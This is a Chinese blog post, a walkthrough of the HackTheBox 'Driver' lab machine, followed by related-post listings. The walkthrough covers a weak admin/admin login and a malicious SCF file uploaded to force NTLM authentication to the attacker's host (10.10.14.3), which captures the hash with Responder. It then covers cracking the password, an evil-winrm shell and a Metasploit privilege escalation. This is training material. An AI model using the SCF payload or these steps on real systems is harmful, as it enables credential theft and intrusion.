HackTheBox | Driver

最新推荐文章于 2023-11-30 06:15:11 发布
最新推荐文章于 2023-11-30 06:15:11 发布
阅读量754 收藏
点赞数
分类专栏: htb记录 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Purpose_7/article/details/127268324
版权

Driver

nmap扫描,开放80、135、445

image-20220808145453806

访问80,提示要求登录

image-20220808145525153

使用弱口令admin/admin成功登录,来到如下页面

image-20220808145602634

http://10.10.11.106/fw_up.php页面能够上传

image-20220808145713532

尝试上传了个php,上传成功,但是找不到上传之后的路径。

参考wp,利用了强制NTLM请求,模拟用户操作从而获得用户hash。方法可参考https://www.secpulse.com/archives/158433.html

创建一个scf文件

[Shell]
Command=2
IconFile=\\10.10.14.3\nc.ico
[Taskbar]
Command=ToggleDesktop

本地开启responder监听,然后将文件上传上去

随后收到了tony的NTLM请求内容

image-20220808153823590

爆破,得到tony用户的密码

image-20220808154100654

evil-winrm命令执行,拿到tony的shell

image-20220808154218209

查看操作系统版本,systeminfo被禁了,找了powershell中查看的方法,得到操作系统版本是win10

[System.Environment]::OSVersion.Version

image-20220808154748669

尝试了https://github.com/KaLendsi/CVE-2021-1732-Exploit没有成功,直接上msf

image-20220808170912033

探测可用的提权

image-20221011163454049

使用exploit/windows/local/ricoh_driver_privesc进行攻击,曾经成功过,后来没有成功过。

image-20221011174337982

xxL7-
关注
专栏目录
[Hack The Box] HTB—Driver walkthrough
ShenZ的博客
02-28 515
[Hack The Box] HTB—Driver walkthrough HTB—Driver [Hack The Box] HTB—Driver walkthrough 一、信息搜集 二、SMB Share – SCF File Attacks && Net-NTLMv2 hash grabbing NTLMv2 evil-winrm 三、提权 machine : Hack The Box——Driver
hackthebox - fuse( smb渗透 & crackmapexec/rpcclient使用 & SeLoadDriverPrivilege提权)
冬萍子癸水
02-13 885
重点,记得先重启这台靶机,否则别人先前用过了 会导致 提权无法执行。浪费我一小时 1、扫描 C:\root> masscan -p1-65535,U:1-65535 10.10.10.193 --rate=1000 -e tun0 Starting masscan 1.0.5 (http://bit.ly/14GZzcT) at 2021-02-13 09:27:04 GMT -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
HackTheBox-Driver WP
h1nt的博客
10-25 537
目前机器还没退休,等retired了丢出来 想要hint也可以滴滴我
hackthebox——注册
shashengwandaren的博客
01-05 1070
进入官网页面如下 是不是觉得这个网站对你无比的友好(才怪了) 根据提示入侵,上来直接右键查看页面源代码 发现里面有好些个网站,我们选择打开"/js/inviteapi.min.js" 如果没有思路或者想法的话,可以尝试一个个点开 打开"/js/inviteapi.min.js"如下 这里大概的意思就是要调用makeInviteCode这个函数 我们打开控制台,这里要注意是在官网页面打开(当初在这里困了好久,问了社团大佬才知道。原因大概就是在官网页面这个函数才能直接用,可以对比一下两个页面的source
Hack The Box 注册教程
ClayYoung的博客
11-19 4628
Hack The Box 注册破解教程 1.进入https://www.hackthebox.eu/invite 2.进入开发者模式找到 这是压缩过的js,右键点击open in new tab 复制下代码到http://lzw.me/pages/jsbeautify/ 发现makeInviteCode函数 在控制台执行makeInviteCode()看响应信息 看一下enctype编码格式然后到http://tool.oschina.net/encrypt?type=3进行解码 发送一个po
Hackthebox:Granny Walkthrough(not use metasploit)
汗的博客
12-06 1100
预备知识 nikto、nmap、iis6.0的webdav、davtest 信息收集a nmap 10.10.10.15 只开了个80端口,那么还是web,浏览器访问目标机器 直接就是报错页面,迷惑,不过可知服务器是iis 扫了下目录,毫无思路,nmap扫下漏洞 nmap -script=vuln 10.10.10.15 还是没什么发现 nikto 扫一下,这次的信息就多了 nikto -h http://10.10.10.15 + Server: Microsoft-IIS/6.0 + Retrieved
HTB Legacy[Hack The Box HTB靶场]writeup系列2
重新启程
02-01 1631
Retired Machines的第二台,前面的靶机都是比较简单的,通常都是适应性的训练,找到合适的突破点就可以了。 目录 0x00 靶场介绍 0x01 端口扫描 0x02 samba服务 0x03永恒之蓝 0x00 靶场介绍 Legacy这台靶机是windows靶机,我们之前在Vulnhub上使用的靶机基本上都是linux操作系统。那么我们就来看看这台靶机是什么情况。 先看下...
Hackthebox:Optimum Walkthrough(not use metasploit)
汗的博客
12-06 532
信息收集 nmap 10.10.10.8 发现只开了一个80端口的http 浏览器打开 google可知HFS的含义是Http File Server,可以上传文件,页面也显示HttpFileServer 2.3 查找相关漏洞 searchsploit HFS -----------------------------------------------------------------------------------------------------------------------------
hackthebox-sauna (域渗透/bloodhound使用/mimikatz使用/secretsdump.py、psexec使用)
冬萍子癸水
01-06 3843
1、扫描 先masscan全局快速扫,再namp精细扫 masscan -p1-65535,U:1-65535 10.10.10.175 --rate=1000 -e tun0 nmap -A 10.10.10.175 -p389,5985,445,53,139,49667,636,135,88,49673,49674,80,464,52613,593,49676 可见 开了很多端口,而88 389 这都是域端口,389后面也详细写了域名字,跟htb里这个域渗透的靶机froest很像了。准备好impack
hackthebox注册教程
01-20
官方网址:https://www.hackthebox.eu/ hackthebox是一个靶场,听说和vulnhub很像,最近迷上了做靶场,于是就像去hackthebox看看,发现还是注册,而且注册好像还没有那么简单 在首页的最下面有个join,进行点击 发现需要邀请码,上网搜了搜,发现邀请码得靠自己获取,好吧,我接受这个挑战。 使用view-source:https://www.hackthebox.eu/invite,查看源代码 发现提示 发现可疑的js文件:/js/inviteapi.min.js   inviteapi  邀请接口 查看该js 在控制台进行调用,给出了提示,
HackTheBox系列——注册
0pt1mus
02-29 2205
转自个人博客:0pt1mus 最近在看杨老师的网络安全自学篇系列,再看到后面的时候,杨老师介绍了一个在线的靶场:Hack The Box,亲身体验了一下,感觉是一个检验和提升自己的渗透能力,因此介绍给大家。 参考: 杨老师网络安全专栏 Hack The Box官网 0x00 简介 Hack The Box是一个在线平台,可让您测试和提高网络安全技能。负责任地使用它,不要破坏您的同事… 可以理解该平...
手把手教会你--Hack The Box的账号注册(HTB Labs部分)
m0_74317362的博客
11-27 2119
请务必跟着博主复现一遍。
hack the box 注册时全名无效、reCapcha validation等注册问题
weixin_68177269的博客
03-12 4211
本篇文章主要记述了在注册hack the box时候遇到的问题及其解决办法。同样可以应用在注册其他外网的情况下。
HackTheBox靶场系列(一)之HackTheBox靶场简介
最新发布
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
11-30 4102
Hack The Box是国外的一个网络安全在线平台,允许用户实践渗透测试技能,并与其他类似兴趣的成员交流想法和方法。它包含一些不断更新的挑战,其中有许多模拟真实场景的机器。HackTheBox靶场是一个虚拟的渗透测试训练平台,用于帮助安全研究人员、渗透测试人员和学生提高他们的技能。它包含一系列的虚拟机,其中每一个虚拟机都代表一个可攻击的目标系统。通过攻击这些虚拟机和解决它们的漏洞,用户可以提高自己的技能和知识,以更好地了解实际环境中的攻击和防御。
文件包含漏洞和hash破解
山兔的博客
10-30 699
Windows是当今世界最主要的操作系统,因为它易于使用的GUI可访问性。大约85%的市场份额已成为攻击的关键操作系统。此外,大多数组织使用Active Directory来设置其Windows域网络。微软聘请NTLM(New Technology LAN Manager)和Kerberos提供认证服务。尽管存在已知漏洞,但即使在新系统上,NTLM 仍被广泛部署,以保持与传统客户端和服务器的兼容性。
hack the box 连接
mixboot
08-30 8997
hack the box vpn连接1,vpn连接报错2,重新下载连接包3,连接成功 1,vpn连接报错 018-10-20 19:25:57 TLS Error: TLS key negotiation failed to occur within 60 seconds (check your network connectivity) 2018-10-20 19:25:57 TLS Error...
入坑 Hack The Box
热门推荐
LainWith的博客
10-19 1万+
视频介绍:https://www.bilibili.com/video/BV17T4y1i7Uh 官方文档:https://help.hackthebox.com/en/articles/5185158-introduction-to-hack-the-box个人感觉前者偏向实战一些,后者偏向练习题一些。更详细的区别,参见: https://hacktalk.net/hacking-the-box-htb-vs-vulnhub/过去注册HTB的时候,需要拿到邀请码才行,类似下面视频这种,但是现在你不需要邀请
Hack The Box】linux练习-- time
人间体佐菲的博客
11-27 1087
Hack The Box】linux练习-- time
the nouveau kernel driver is
03-16
Nouveau内核驱动程序是一个开源的图形驱动程序,用于支持NVIDIA显卡。它是Linux内核的一部分,可以在大多数Linux发行版中找到。Nouveau驱动程序提供了基本的2D和3D图形加速功能,但与NVIDIA官方驱动程序相比,性能和...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值